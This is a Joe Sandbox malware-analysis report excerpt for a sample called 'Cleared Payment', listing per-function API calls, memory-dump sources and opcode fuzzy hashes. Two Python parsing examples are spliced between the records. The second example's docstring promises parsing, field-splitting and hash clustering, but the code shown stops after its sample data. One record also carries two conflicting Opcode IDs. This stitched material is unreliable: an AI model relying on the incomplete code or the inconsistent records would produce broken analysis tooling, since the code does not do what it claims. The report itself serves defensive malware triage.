                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6bae49c (basic blocks 6bae49c-6bafd6c; block edge list omitted). Calls in this graph: 6baa46c and CallWindowProcW.
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06BAFD11
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: e28d0368d64f7101d50f17211325b0aa96774beb87eec2ca96d6f33e8ab5f228
                                                            • Instruction ID: 0b6a3253212c6ca5bc71545cd2cb88e9c096bfb3c0a9421d3505329efb69f023
                                                            • Opcode Fuzzy Hash: e28d0368d64f7101d50f17211325b0aa96774beb87eec2ca96d6f33e8ab5f228
                                                            • Instruction Fuzzy Hash: E7415AB5904309CFDB44CF99C488BAABBF9FF88314F248499D519AB321D774A841CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6ba3048 (basic blocks 6ba3048-6ba310a; block edge list omitted). API call in this graph: DuplicateHandle.
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: e1c1163c077c5b8bbba67b8b0683a3a52cbdb71fb3c60d1e66ef0e36486eab49
                                                            • Instruction ID: f4c263525580964ee7ba475d8f8977e2c24d60bbcdffd1945d44904fc828fef7
                                                            • Opcode Fuzzy Hash: e1c1163c077c5b8bbba67b8b0683a3a52cbdb71fb3c60d1e66ef0e36486eab49
                                                            • Instruction Fuzzy Hash: 6F21E3B5D00249DFDB10CFAAD984ADEBBF5EB48310F14805AE919A3350D375A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            • Blocks: 454 6ba3050-6ba30e4 (calls DuplicateHandle), 455 6ba30ed-6ba310a, 456 6ba30e6-6ba30ec
                                                            • Edges: 454->455, 454->456, 456->455
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 5ca9858a3b0eb19b4c2830a710be9814ff92507a3ba518ae1150e504b24095f4
                                                            • Instruction ID: 99c956e7be22da5619ddb925105f6f3448d2301f024fa66dd8ce7ecc59e35878
                                                            • Opcode Fuzzy Hash: 5ca9858a3b0eb19b4c2830a710be9814ff92507a3ba518ae1150e504b24095f4
                                                            • Instruction Fuzzy Hash: C821B3B59003499FDB10CF9AD984ADEBBF4EB48320F14845AE914A3350D375A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            • Blocks: 459 6bab779-6bab7c0, 461 6bab7c8-6bab7f7 (calls LoadLibraryExW), 462 6bab7c2-6bab7c5, 463 6bab7f9-6bab7ff, 464 6bab800-6bab81d
                                                            • Edges: 459->461, 459->462, 461->463, 461->464, 462->461, 463->464
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BAB5F9,00000800,00000000,00000000), ref: 06BAB7EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 92926e300ac9e411a2e6adf4b8f4807bc62e076fe43295965ea02c06ac07ac32
                                                            • Instruction ID: 579c0352e43d0f8539cc2987e6ec00e5dd43e27539b6c37fa151b5a0b2f243a7
                                                            • Opcode Fuzzy Hash: 92926e300ac9e411a2e6adf4b8f4807bc62e076fe43295965ea02c06ac07ac32
                                                            • Instruction Fuzzy Hash: 2811E4B6D043499FDB10CFAAD844ADEFBF8EB88710F10846AE519A7200C7B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            • Blocks: 467 6baa2d0-6bab7c0, 469 6bab7c8-6bab7f7 (calls LoadLibraryExW), 470 6bab7c2-6bab7c5, 471 6bab7f9-6bab7ff, 472 6bab800-6bab81d
                                                            • Edges: 467->469, 467->470, 469->471, 469->472, 470->469, 471->472
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BAB5F9,00000800,00000000,00000000), ref: 06BAB7EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 5e0d060d4062e9c5cc671eeef045687fb3f645c824709d2ab24dcb1500be9167
                                                            • Instruction ID: 2b88b65a168e7a45a8f018ac184f8032f07f468cb5c62986d3a713d89e5d2bb6
                                                            • Opcode Fuzzy Hash: 5e0d060d4062e9c5cc671eeef045687fb3f645c824709d2ab24dcb1500be9167
                                                            • Instruction Fuzzy Hash: E211E4B6D043499FDB10CF9AD884B9EFBF4EB48710F10856EE529A7200C3B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            • Blocks: 475 2bceb40-2bceb7e, 476 2bceb86-2bcebb4 (calls GlobalMemoryStatusEx), 477 2bcebbd-2bcebe5, 478 2bcebb6-2bcebbc
                                                            • Edges: 475->476, 476->477, 476->478, 478->477
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 02BCEBA7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3325348851.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2bc0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: e12085a6a5732ce487e3ae5c6e658aac56f061795546c7baaac640e1279885f1
                                                            • Instruction ID: c3a1af4657828b45186dd98a912e5544e7eda8e43565fe9e9835710f0a26ce9b
                                                            • Opcode Fuzzy Hash: e12085a6a5732ce487e3ae5c6e658aac56f061795546c7baaac640e1279885f1
                                                            • Instruction Fuzzy Hash: 231112B2C0065ADBCB10CF9AC544B9EFBF4AF48320F10816AD918A7240D3B8A950CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
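The function records above repeat the same call site under different Opcode IDs (DuplicateHandle at 06BA30D7 appears twice with overlapping block ranges), and every record comes from a memory region with "based on PE: false", i.e. code that was not mapped from an image on disk. A small parser for this record layout, added here as an example and not Joe Sandbox code, collapses records by call site and flags calls such as GlobalMemoryStatusEx that are made from such regions. The record text in `SAMPLE` is constructed to mirror the entries on this page, and the `EVASION_APIS` set is this example's own assumption about which APIs commonly feed VM or sandbox checks.

```python
"""Triage Joe Sandbox IDA-plugin function records (the per-function blocks on this page).

Example code written for this page, not part of Joe Sandbox. SAMPLE is constructed
to mirror the page's entries; EVASION_APIS is an assumption of the example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Assumption of this example: APIs whose results are commonly compared against
# VM/sandbox fingerprints (e.g. GlobalMemoryStatusEx for total RAM).
EVASION_APIS = {"GlobalMemoryStatusEx", "GetSystemInfo", "GetTickCount", "IsDebuggerPresent"}

# Constructed sample in the page's layout: two overlapping DuplicateHandle records
# (same call site, different Opcode IDs) and one GlobalMemoryStatusEx record.
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
Memory Dump Source
• Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
Similarity
• Opcode ID: e1c1163c077c5b8bbba67b8b0683a3a52cbdb71fb3c60d1e66ef0e36486eab49
Uniqueness Score: -1.00%
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BA30D7
Memory Dump Source
• Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
Similarity
• Opcode ID: 5ca9858a3b0eb19b4c2830a710be9814ff92507a3ba518ae1150e504b24095f4
Uniqueness Score: -1.00%
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 02BCEBA7
Memory Dump Source
• Source File: 00000004.00000002.3325348851.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
Similarity
• Opcode ID: e12085a6a5732ce487e3ae5c6e658aac56f061795546c7baaac640e1279885f1
Uniqueness Score: -1.00%
"""

# "• Api.Module(args), ref: ADDR" with the argument list optional (see the GlobalMemoryStatusEx line).
API_RE = re.compile(r"•\s*(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
OPCODE_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")
SCORE_RE = re.compile(r"Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)  # (api, module, call-site address)
    source_file: str = ""
    region_base: int = 0
    pe_backed: bool = False
    opcode_id: str = ""
    uniqueness: float = 0.0


def parse_records(text):
    """Split plugin output into records; each record closes at its 'Uniqueness Score' line."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if m := API_RE.search(line):
            cur.apis.append((m.group(1), m.group(2), int(m.group(3), 16)))
        elif m := SRC_RE.search(line):
            cur.source_file, cur.region_base = m.group(1), int(m.group(2), 16)
            cur.pe_backed = m.group(3) == "true"
        elif m := OPCODE_RE.search(line):
            cur.opcode_id = m.group(1)
        elif m := SCORE_RE.search(line):
            cur.uniqueness = float(m.group(1))
            records.append(cur)
            cur = FunctionRecord()
    return records


def collapse_call_sites(records):
    """Group Opcode IDs by (API, call-site address). Several IDs on one call site are
    overlapping function bounds over the same code, not separate calls."""
    groups = defaultdict(list)
    for r in records:
        for api, _module, addr in r.apis:
            groups[(api, addr)].append(r.opcode_id)
    return dict(groups)


def flag_evasion_calls(records):
    """Return (API, call site, region base) for EVASION_APIS calls made from memory
    that is not backed by a PE image, i.e. unpacked or JIT-emitted code."""
    hits = []
    for r in records:
        for api, _module, addr in r.apis:
            if api in EVASION_APIS and not r.pe_backed:
                hits.append((api, f"{addr:08X}", f"{r.region_base:08X}"))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (api, addr), ids in collapse_call_sites(recs).items():
        print(f"{api} @ {addr:08X}: {len(ids)} record(s)")
    for api, addr, base in flag_evasion_calls(recs):
        print(f"possible sandbox check: {api} at {addr} in non-PE region {base}")
```

Run it against a full report's function-record text instead of `SAMPLE` to get one line per distinct call site and a short list of evasion-relevant calls originating from unmapped memory; the `pe_backed` flag is what separates the unpacked payload's code from calls made by the original on-disk image.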

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06BAB57E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 2301627c6764141f0d757a5dfbee52ca84cb74ef96ebc96da6698eaa57b6e7df
                                                            • Instruction ID: 078137470eafe6f7b30f7a439ba86fe3c14cca2fefe4ef2c1e5aa670f53da0f3
                                                            • Opcode Fuzzy Hash: 2301627c6764141f0d757a5dfbee52ca84cb74ef96ebc96da6698eaa57b6e7df
                                                            • Instruction Fuzzy Hash: 2611DFB6C047498FDB10CF9AC444B9EFBF4EB88724F14846AD929A7210D3B9A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3986614761dbd91b5784d35a612255159e794bf10115dceef9303bfbbdf6ff37
                                                            • Instruction ID: f27736558a7739b0b58d00e03af587d45a336ff480bd0eb37bc2be7bc2480d0a
                                                            • Opcode Fuzzy Hash: 3986614761dbd91b5784d35a612255159e794bf10115dceef9303bfbbdf6ff37
                                                            • Instruction Fuzzy Hash: DE926874E002058FDB64DB68C584AADBBF2EF44314F54A4A9D40AAB365DBB5ED81CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f263d90827ba14fa05cf766e515385beaca78aa77e2b938ffa9528ce4423cef
                                                            • Instruction ID: 6ec8195d1fcb7a8a01c0bf673badd9f83766183ff6f7ae6ea436104456b13ce4
                                                            • Opcode Fuzzy Hash: 9f263d90827ba14fa05cf766e515385beaca78aa77e2b938ffa9528ce4423cef
                                                            • Instruction Fuzzy Hash: 39622E70A11206CFDB55EB68D590AADB7B2FF84304F2099A8D0459F359DBB9FC46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 630fdc042b3b4695ae53317972ee1adf96e7372e53f59c5b8b2f3b399243e5e6
                                                            • Instruction ID: 92a65534eba51f39c8ab20f3cfc1817b71bd0f7cc93351c63781259d05790cf8
                                                            • Opcode Fuzzy Hash: 630fdc042b3b4695ae53317972ee1adf96e7372e53f59c5b8b2f3b399243e5e6
                                                            • Instruction Fuzzy Hash: 79025DB0E1020A8FDBA4DB69D4806BDB7B2FB85310F10A5AAD446DB355DFB4EC41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83532ec29248c3d6c62b580509050875cab017b89f2d94343467da5e92c50dd4
                                                            • Instruction ID: 160441a720aa4f982cd056ec745114763c14bf1c6594d81e5376fe9651823a43
                                                            • Opcode Fuzzy Hash: 83532ec29248c3d6c62b580509050875cab017b89f2d94343467da5e92c50dd4
                                                            • Instruction Fuzzy Hash: 6BE16F71F102068FDB65DB68D8806AEBBB2FF89300F20A569D405AB345DFB5D846CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cef0a0d318762419b57d4732d6d57e3288719cd66f923b0abe82dd760d961ffa
                                                            • Instruction ID: f061c3accf408c453b73c31f845ec9401d11324eb97a5b6ebc39df826ef37864
                                                            • Opcode Fuzzy Hash: cef0a0d318762419b57d4732d6d57e3288719cd66f923b0abe82dd760d961ffa
                                                            • Instruction Fuzzy Hash: F9914271B1115A8FDB54EB69D850BAEB7F6FF85200F1095A9C50ADB348EF70EC418B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a1794b97cbdd73a1a0d7ad63845c88beb02299784f9520a09df94fddaca50ab
                                                            • Instruction ID: c1d6952ccbb45338ce87465acb35a3b4982db4a7111b27e535657b87f2604712
                                                            • Opcode Fuzzy Hash: 9a1794b97cbdd73a1a0d7ad63845c88beb02299784f9520a09df94fddaca50ab
                                                            • Instruction Fuzzy Hash: 7561C3B2F001624BDF549A6DC8806AFBBD7EFD4210B155479E90EDB364EEA5EC0287C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c364c9e8dff1509d5ca507228ff64d93557c47248ed9a360aea4cda69324792
                                                            • Instruction ID: b930e77d979bba4dfb16ffd50c12150263397bc320185a2f3624b8718e7288b8
                                                            • Opcode Fuzzy Hash: 1c364c9e8dff1509d5ca507228ff64d93557c47248ed9a360aea4cda69324792
                                                            • Instruction Fuzzy Hash: B3816C70B0120A8BDB54DFA8D4947AEB7F2FF89300F149468D50ADB389EB74DC428B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d68cae0a2a5cadb560d16b8ebb34c69f7db36e7893d93145f52bf36380ed8e3
                                                            • Instruction ID: b2d807d6b01be9a79cf4804303209c4daf964453414b1c866edcd6b6dac22111
                                                            • Opcode Fuzzy Hash: 2d68cae0a2a5cadb560d16b8ebb34c69f7db36e7893d93145f52bf36380ed8e3
                                                            • Instruction Fuzzy Hash: B7915E70E1025A8FDF60DF68C840BDDB7B1FF89300F209599D549AB245DB70AA85CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4ae662603a34328b1cc6283f17692ccb8bac73716a408b84e95e3e759d1cc55
                                                            • Instruction ID: 566735c668832547dd479db02007ad78709380ab9e5cd4eef5cd2434b8c00842
                                                            • Opcode Fuzzy Hash: b4ae662603a34328b1cc6283f17692ccb8bac73716a408b84e95e3e759d1cc55
                                                            • Instruction Fuzzy Hash: 7E914D70E1061A8BDF60DF68C840BDDB7B1FF89304F209599D549BB245DB70AA85CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1ab1548c000b089f7ad9cba0ee1ac317c370a9754bdac9c8958d433cf1d097b
                                                            • Instruction ID: 4356900cf14793f255470d1b06d992663cb01ee5b04774bbd80e03cba218defb
                                                            • Opcode Fuzzy Hash: a1ab1548c000b089f7ad9cba0ee1ac317c370a9754bdac9c8958d433cf1d097b
                                                            • Instruction Fuzzy Hash: 03712B70A002099FDB54DBA9D980AEDBBF6FF88344F249469D015EB365DB70EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87d02ba759868ad68e2d20285506fc3506abcfbb1f719ba81c91c4717059203e
                                                            • Instruction ID: 3e118745856bcc0169fc658c88adecadb011ec2266983e87a97d431c23a74ebd
                                                            • Opcode Fuzzy Hash: 87d02ba759868ad68e2d20285506fc3506abcfbb1f719ba81c91c4717059203e
                                                            • Instruction Fuzzy Hash: AA712A70A002099FDB54DBA9D980AEDBBF6FF88340F249569D005EB365DBB0EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c48002d793649bca3406370547887761c47be6721420365450b7b0acc91109e
                                                            • Instruction ID: a568609da031838595cd6e0cf0c2471c11eb286fe834a945f18f41f5089d081a
                                                            • Opcode Fuzzy Hash: 9c48002d793649bca3406370547887761c47be6721420365450b7b0acc91109e
                                                            • Instruction Fuzzy Hash: 9C618071F002199FEB649FA9D8547AEBBF6FF88300F208429D106AB395DAB54C45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97cc01ce5759f461c7d20694f721b0bc75fdb11dddd846d6b24d2481f565381d
                                                            • Opcode ID: 43f4ad2339e7cc335aa51f354caf3f94a81b1fb87efe8e343938fea042911a93
                                                            • Instruction ID: 2db6fb6d19fca6311b86dd90cfceb058bbf399e68088d9eeedfb34ee31d86f06
                                                            • Opcode Fuzzy Hash: 43f4ad2339e7cc335aa51f354caf3f94a81b1fb87efe8e343938fea042911a93
                                                            • Instruction Fuzzy Hash: F5018171B100114BDB75A66DA4507BE66D6EBC9650F10A879E50AC7350DDA5EC034381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39e59d26f5eb8ebea29dd3ed4130fbe2597b46ba4145365d10168bc412b0e05e
                                                            • Instruction ID: d9856f3548658e2cb5f95d25676fa4c16b0b0531e162c2bdae09aa58e7ea4047
                                                            • Opcode Fuzzy Hash: 39e59d26f5eb8ebea29dd3ed4130fbe2597b46ba4145365d10168bc412b0e05e
                                                            • Instruction Fuzzy Hash: 080131B1F101114BDB75EA6CD85076EB7D6E785720F10987DE50BC7344DE65EC428780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
                                                            • Instruction ID: d880d10fc571034d17bb80039b6db8bf3ee98797611c6a17e578d8c838b01a21
                                                            • Opcode Fuzzy Hash: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
                                                            • Instruction Fuzzy Hash: CBE0D8F2E115459FDF50CE70D9943EE73A5D705204F2058D2D404C7142F1B1DE408340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
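The records above are the per-function metadata the report lists for code disassembled from one memory dump of process 4 (the dump name, its Offset, the Opcode ID / Opcode Fuzzy Hash, the Instruction ID / Instruction Fuzzy Hash, and a Uniqueness Score). To reuse them outside the report viewer, for instance to find functions this dump shares with another sample's, they first have to be parsed and sanity-checked. The following is an added example, not Joe Sandbox's own code: it parses records in the text form shown above, splits the dotted fields of the .sdmp file name under an assumed naming scheme (process index, stage, dump id, base address, four flag words), cross-checks only the base address against the report's own Offset value, and indexes records by fuzzy hash. The sample input is two records copied from the text above.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records (the text form shown
above) and sanity-check them before clustering by fuzzy hash. Added example, not
Joe Sandbox code. ASSUMPTION: the dotted .sdmp name fields are read as process
index, stage, dump id, base address and four flag words; only the base address
is cross-checked against the report's own 'Offset' value."""
import re
from collections import defaultdict
from string import hexdigits

BULLET = "\u2022"  # the bullet the report prefixes field lines with
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\."
                     r"([0-9A-Fa-f]{16})((?:\.[0-9A-Fa-f]{8}){4})\.sdmp$")

# Constructed sample: two records copied from the report text above.
SAMPLE = """\
Memory Dump Source
• Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7492d01dc5239d84a9b70411e8997b9ef32af0c39703e06ca1c3a5436a960cb
• Instruction ID: f108fb2542da72cdcd4e73932ce296d710d7a8a06cab732e0bbe5a895deaa22c
• Opcode Fuzzy Hash: c7492d01dc5239d84a9b70411e8997b9ef32af0c39703e06ca1c3a5436a960cb
• Instruction Fuzzy Hash: A401DF72B100114BDB71A66CA450BBEB3E6EBC9650F14983DE90AD7340DEA0EC028380
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
• Instruction ID: d880d10fc571034d17bb80039b6db8bf3ee98797611c6a17e578d8c838b01a21
• Opcode Fuzzy Hash: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
• Instruction Fuzzy Hash: CBE0D8F2E115459FDF50CE70D9943EE73A5D705204F2058D2D404C7142F1B1DE408340
Uniqueness
Uniqueness Score: -1.00%
"""


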